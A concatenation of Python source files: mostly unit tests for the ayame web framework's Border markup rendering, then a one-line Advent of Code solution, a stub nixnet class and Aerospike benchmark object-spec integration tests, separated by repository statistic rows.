self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 12)
self.assertWS(body, 14)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Spam)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (SpamBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (SpamBorder)'])
p = body[10]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (SpamBorder)'])
p = body[13]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Spam)'])
def test_border_with_markup_inheritance(self):
class Eggs(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(HamBorder('border'))
class EggsBorder(Border):
pass
class HamBorder(EggsBorder):
pass
with self.application():
mc = Eggs('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 11)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
self.assertWS(head, 8)
self.assertWS(head, 10)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Eggs'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Eggs',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'EggsBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[9]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'HamBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 15)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 12)
self.assertWS(body, 14)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Eggs)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (HamBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (HamBorder)'])
p = body[10]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (HamBorder)'])
p = body[13]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Eggs)'])
def test_invalid_markup_no_ayame_border(self):
class Toast(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(ToastBorder('border'))
class ToastBorder(Border):
pass
with self.application():
mc = Toast('a')
with self.assertRaisesRegex(ayame.RenderingError, r"'ayame:border' .* not found\b"):
mc.render()
def test_invalid_markup_no_ayame_body(self):
class Beans(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(BeansBorder('border'))
class BeansBorder(Border):
pass
with self.application():
mc = Beans('a')
with self.assertRaisesRegex(ayame.RenderingError, r"'ayame:body' .* not found\b"):
mc.render()
def test_invalid_markup_unknown_ayame_element(self):
class Bacon(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(BaconBorder('border'))
class BaconBorder(Border):
pass
with self.application():
mc = Bacon('a')
with self.assertRaisesRegex(ayame.RenderingError, r"\bunknown .* 'ayame:bacon'"):
mc.render()
def test_empty_markup(self):
class Sausage(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(SausageBorder('border'))
class SausageBorder(Border):
pass
with self.application():
mc = Sausage('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 5)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Sausage'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Sausage',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 9)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Sausage)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['inside border (Sausage)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Sausage)'])
def test_duplicate_ayame_elements(self):
class Lobster(MarkupContainer):
def __init__(self, id):
super().__init__(id)
self.add(LobsterBorder('border'))
class LobsterBorder(Border):
pass
with self.application():
mc = Lobster('a')
m, html = mc.render()
self.assertEqual(m.xml_decl, {'version': '1.0'})
self.assertEqual(m.lang, 'xhtml1')
self.assertEqual(m.doctype, markup.XHTML1_STRICT)
self.assertTrue(m.root)
self.assertEqual(html.qname, self.html_of('html'))
self.assertEqual(html.attrib, {})
self.assertEqual(html.type, markup.Element.OPEN)
self.assertEqual(html.ns, {
'': markup.XHTML_NS,
'xml': markup.XML_NS,
'ayame': markup.AYAME_NS,
})
self.assertEqual(len(html), 5)
self.assertWS(html, 0)
self.assertWS(html, 2)
self.assertWS(html, 4)
head = html[1]
self.assertEqual(head.qname, self.html_of('head'))
self.assertEqual(head.attrib, {})
self.assertEqual(head.type, markup.Element.OPEN)
self.assertEqual(head.ns, {})
self.assertEqual(len(head), 8)
self.assertWS(head, 0)
self.assertWS(head, 2)
self.assertWS(head, 4)
self.assertWS(head, 5)
self.assertWS(head, 7)
title = head[1]
self.assertEqual(title.qname, self.html_of('title'))
self.assertEqual(title.attrib, {})
self.assertEqual(title.type, markup.Element.OPEN)
self.assertEqual(title.ns, {})
self.assertEqual(title.children, ['Lobster'])
meta = head[3]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'Lobster',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
meta = head[6]
self.assertEqual(meta.qname, self.html_of('meta'))
self.assertEqual(meta.attrib, {
self.html_of('name'): 'class',
self.html_of('content'): 'LobsterBorder',
})
self.assertEqual(meta.type, markup.Element.EMPTY)
self.assertEqual(meta.ns, {})
self.assertEqual(meta.children, [])
body = html[3]
self.assertEqual(body.qname, self.html_of('body'))
self.assertEqual(body.attrib, {})
self.assertEqual(body.type, markup.Element.OPEN)
self.assertEqual(body.ns, {})
self.assertEqual(len(body), 17)
self.assertWS(body, 0)
self.assertWS(body, 2)
self.assertWS(body, 3)
self.assertWS(body, 5)
self.assertWS(body, 6)
self.assertWS(body, 8)
self.assertWS(body, 9)
self.assertWS(body, 11)
self.assertWS(body, 13)
self.assertWS(body, 14)
self.assertWS(body, 16)
p = body[1]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before border (Lobster)'])
p = body[4]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['before ayame:body (LobsterBorder)'])
p = body[7]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(len(p), 3)
p.normalize()
self.assertEqual(p.children, ['inside border (LobsterBorder)'])
ayame_body = body[10]
self.assertEqual(ayame_body.qname, self.ayame_of('body'))
self.assertEqual(ayame_body.attrib, {})
self.assertEqual(ayame_body.type, markup.Element.EMPTY)
self.assertEqual(ayame_body.ns, {})
self.assertEqual(ayame_body.children, [])
p = body[12]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after ayame:body (LobsterBorder)'])
p = body[15]
self.assertEqual(p.qname, self.html_of('p'))
self.assertEqual(p.attrib, {})
self.assertEqual(p.type, markup.Element.OPEN)
self.assertEqual(p.ns, {})
self.assertEqual(p.children, ['after border (Lobster)'])
def test_feedback_field_border(self):
with self.application(self.new_environ()):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_valid(self):
query = ('{path}=form&'
'field:field_body:text=text')
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_invalid(self):
query = ('{path}=form&'
'field:field_body:text=')
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=True)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_feedback_field_border_nonexistent_path(self):
query = '{path}=border'
with self.application(self.new_environ(query=query)):
p = ShallotsPage()
status, headers, content = p()
html = self.format(ShallotsPage, error=False)
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_render_ayame_message(self):
with self.application(self.new_environ(accept='en')):
p = TomatoPage()
status, headers, content = p()
html = self.format(TomatoPage, message='before, body, after')
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
def test_render_ayame_message_ja(self):
with self.application(self.new_environ(accept='ja, en')):
p = TomatoPage()
status, headers, content = p()
html = self.format(TomatoPage, message='\u524d, \u4e2d, \u5f8c')
self.assertEqual(status, http.OK.status)
self.assertEqual(headers, [
('Content-Type', 'text/html; charset=UTF-8'),
('Content-Length', str(len(html))),
])
self.assertEqual(content, [html])
class MarkupContainer(ayame.MarkupContainer):
def render(self):
m = self.load_markup()
self.head = self.find_head(m.root)
html = super().render(m.root)
return m, html
class Border(border.Border):
def __init__(self, id, model=None):
super().__init__(id, model)
self.add(basic.Label('class', self.__class__.__name__))
self.body.find('class').render_body_only = True
def page(self):
for parent in self.iter_parent():
pass
return parent
class TomatoPage(ayame.Page):
html_t = textwrap.dedent("""\
<?xml version="1.0"?>
{doctype}
<html xmlns="{xhtml}">
<head>
<title>TomatoPage</title>
</head>
<body>
<p>{message}</p>
</body>
</html>
""")
def __init__(self):
super().__init__()
self.add(TomatoBorder('border'))
class TomatoBorder(Border):
pass
class ShallotsPage(ayame.Page):
html_t = textwrap.dedent("""\
<?xml version="1.0"?>
{doctype}
<html xmlns="{xhtml}">
<head>
<title>ShallotsPage</title>
</head>
<body>
<form action="/" method="post">
<div class="ayame-hidden"><input name="{path}" type="hidden" value="form" /></div>
<fieldset>
<legend>form</legend>
{error}
</fieldset>
</form>
</body>
</html>
""")
kwargs = {
'error': lambda v=False: textwrap.indent(textwrap.dedent("""\
<div class="field-error">
<input name="field:field_body:text" type="text" value="" /><br />
<p class="feedback">'text' is required</p>
</div>
""" if v else """\
<div class="field">
<input name="field:field_body:text" type="text" value="" /><br />
</div>
"""), ' ' * 8).rstrip(),
}
def __init__(self):
super().__init__()
self.add(form.Form('form'))
self.find('form').add(border.FeedbackFieldBorder('field'))
self.find('form:field').add(form.TextField('text'))
self.find('form:field:field_body:text').required = True
| 34.347826 | 96 | 0.574643 | 2,783 | 24,490 | 4.969457 | 0.070068 | 0.26898 | 0.104121 | 0.045553 | 0.843456 | 0.827766 | 0.808315 | 0.798409 | 0.780043 | 0.774693 | 0 | 0.010766 | 0.275582 | 24,490 | 712 | 97 | 34.396067 | 0.768784 | 0.004206 | 0 | 0.751634 | 0 | 0.001634 | 0.107675 | 0.010788 | 0 | 0 | 0 | 0 | 0.53268 | 1 | 0.042484 | false | 0.01634 | 0.006536 | 0 | 0.091503 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
bda6b65730423d3269441bb0b17024f0da64cbcc | 126 | py | Python | Tommimon/10/oneline.py | Tommimon/advent-of-code-2020 | e2337c95b87b7368ba34c5dc4e714b1376594beb | [
"MIT"
] | 3 | 2020-11-29T20:44:02.000Z | 2021-11-30T11:30:25.000Z | Tommimon/10/oneline.py | Tommimon/advent-of-code-2020 | e2337c95b87b7368ba34c5dc4e714b1376594beb | [
"MIT"
] | 2 | 2020-12-02T18:48:22.000Z | 2021-05-11T00:08:49.000Z | Tommimon/10/oneline.py | Tommimon/advent-of-code-2020 | e2337c95b87b7368ba34c5dc4e714b1376594beb | [
"MIT"
] | null | null | null | print((lambda n:(len(n)-((max(n)+3-len(n))//2))*((max(n)+3-len(n))//2))([0]+list(map(int,open("i","r").read().split('\n')))))
| 63 | 125 | 0.5 | 27 | 126 | 2.333333 | 0.592593 | 0.190476 | 0.15873 | 0.253968 | 0.31746 | 0.31746 | 0 | 0 | 0 | 0 | 0 | 0.040323 | 0.015873 | 126 | 1 | 126 | 126 | 0.467742 | 0 | 0 | 0 | 0 | 0 | 0.031746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
bdc7167344ac39c4dd684d36f5bbd287e4e1cf16 | 178 | py | Python | nixnet/database/_database_object.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 16 | 2017-06-14T19:44:45.000Z | 2022-02-06T15:14:52.000Z | nixnet/database/_database_object.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 216 | 2017-06-15T16:41:10.000Z | 2021-09-23T23:00:50.000Z | nixnet/database/_database_object.py | ni-ldp/nixnet-python | 83f30c5b44098de0dc4828838e263b7be0866228 | [
"MIT"
] | 23 | 2017-06-14T22:51:08.000Z | 2022-03-03T03:04:40.000Z | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
class DatabaseObject(object):
"""Database object interface."""
| 22.25 | 38 | 0.814607 | 20 | 178 | 6.55 | 0.6 | 0.229008 | 0.366412 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129213 | 178 | 7 | 39 | 25.428571 | 0.845161 | 0.146067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.75 | 0 | 1 | 0.25 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
bde12af074dd12c3379582acb35430d852a6ef2b | 9,934 | py | Python | src/test/integration/test_object_spec.py | kyle-singer/aerospike-benchmark | 5ac1c08d68a2d7883a9e831cd9fb264c4314bc04 | [
"Apache-2.0"
] | 9 | 2020-11-26T05:10:40.000Z | 2022-03-09T15:57:42.000Z | src/test/integration/test_object_spec.py | kyle-singer/aerospike-benchmark | 5ac1c08d68a2d7883a9e831cd9fb264c4314bc04 | [
"Apache-2.0"
] | 26 | 2020-12-02T04:28:38.000Z | 2021-12-08T20:17:25.000Z | src/test/integration/test_object_spec.py | kyle-singer/aerospike-benchmark | 5ac1c08d68a2d7883a9e831cd9fb264c4314bc04 | [
"Apache-2.0"
] | 8 | 2020-11-26T03:01:30.000Z | 2022-01-06T22:40:28.000Z |
import lib
def test_b():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o b --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_b(bins["testbin"]))
def test_const_b_true():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o true --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_const_b(bins["testbin"], True))
def test_const_b_false():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o false --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_const_b(bins["testbin"], False))
def test_I1():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I1 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I1(bins["testbin"]))
def test_I2():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I2 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I2(bins["testbin"]))
def test_I3():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I3 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I3(bins["testbin"]))
def test_I4():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I4 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I4(bins["testbin"]))
def test_I5():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I5 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I5(bins["testbin"]))
def test_I6():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I6 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I6(bins["testbin"]))
def test_I7():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I7 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I7(bins["testbin"]))
def test_I8():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o I8 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_I8(bins["testbin"]))
def test_const_I():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o 123 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_const_I(bins["testbin"], 123))
def test_D():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o D --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_D(bins["testbin"]))
def test_const_D():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o 123.456 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_const_D(bins["testbin"], 123.456))
def test_S1():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S1 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 1))
def test_S2():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S2 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 2))
def test_S3():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S3 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 3))
def test_S4():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S4 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 4))
def test_S5():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S5 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 5))
def test_S6():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S6 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 6))
def test_S7():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S7 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 7))
def test_S8():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S8 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 8))
def test_S100():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S100 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 100))
def test_S10000():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o S10000 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_S(bins["testbin"], 10000))
def test_const_S():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o \\\"test\\ string\\\" --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_const_S(bins["testbin"], "test string"))
def test_B1():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B1 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 1))
def test_B2():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B2 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 2))
def test_B3():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B3 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 3))
def test_B4():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B4 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 4))
def test_B5():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B5 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 5))
def test_B6():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B6 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 6))
def test_B7():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B7 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 7))
def test_B8():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B8 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 8))
def test_B100():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B100 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 100))
def test_B10000():
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o B10000 --random")
lib.check_for_range(0, 100, lambda meta, key, bins: lib.obj_spec_is_B(bins["testbin"], 10000))
def test_list():
def check_bin(b):
assert(type(b) is list)
assert(len(b) == 7)
lib.obj_spec_is_I1(b[0])
lib.obj_spec_is_I2(b[1])
lib.obj_spec_is_I3(b[2])
lib.obj_spec_is_S(b[3], 10)
lib.obj_spec_is_B(b[4], 20)
lib.obj_spec_is_D(b[5])
lib.obj_spec_is_b(b[6])
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o [I1,I2,I3,S10,B20,D,b] --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_map():
def check_bin(b):
assert(type(b) is dict)
assert(len(b) == 50)
for key in b:
lib.obj_spec_is_S(key, 5)
lib.obj_spec_is_I4(b[key])
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o {50*S5:I4} --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_const_map():
def check_bin(b):
assert(type(b) is dict)
assert(len(b) == 1)
for key in b:
lib.obj_spec_is_const_I(key, 123)
lib.obj_spec_is_const_S(b[key], "string")
lib.run_benchmark("--workload I --start-key 0 --keys 100 -o {123:\\\"string\\\"} --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_compound():
def check_bin(b):
assert(type(b) is list)
assert(len(b) == 3)
assert(type(b[0]) is dict)
assert(len(b[0]) == 50)
for key in b[0]:
lib.obj_spec_is_S(key, 5)
lib.obj_spec_is_I4(b[0][key])
lib.obj_spec_is_I3(b[1])
assert(type(b[2]) is list)
assert(len(b[2]) == 4)
lib.obj_spec_is_D(b[2][0])
lib.obj_spec_is_I2(b[2][1])
assert(type(b[2][2]) is dict)
assert(len(b[2][2]) == 10)
for key in b[2][2]:
lib.obj_spec_is_I5(key)
lib.obj_spec_is_S(b[2][2][key], 11)
lib.obj_spec_is_b(b[2][3])
lib.run_benchmark("--workload I --start-key 0 --keys 100 " +
"-o [{50*S5:I4},I3,[D,I2,{10*I5:S11},b]] --random")
lib.check_for_range(0, 100, lambda meta, key, bins: check_bin(bins["testbin"]))
def test_multiple_bins():
def check_bins(b):
assert(len(b) == 7)
lib.obj_spec_is_I1(b["testbin"])
lib.obj_spec_is_I2(b["testbin_2"])
lib.obj_spec_is_I3(b["testbin_3"])
lib.obj_spec_is_S(b["testbin_4"], 10)
lib.obj_spec_is_B(b["testbin_5"], 20)
lib.obj_spec_is_D(b["testbin_6"])
lib.obj_spec_is_b(b["testbin_7"])
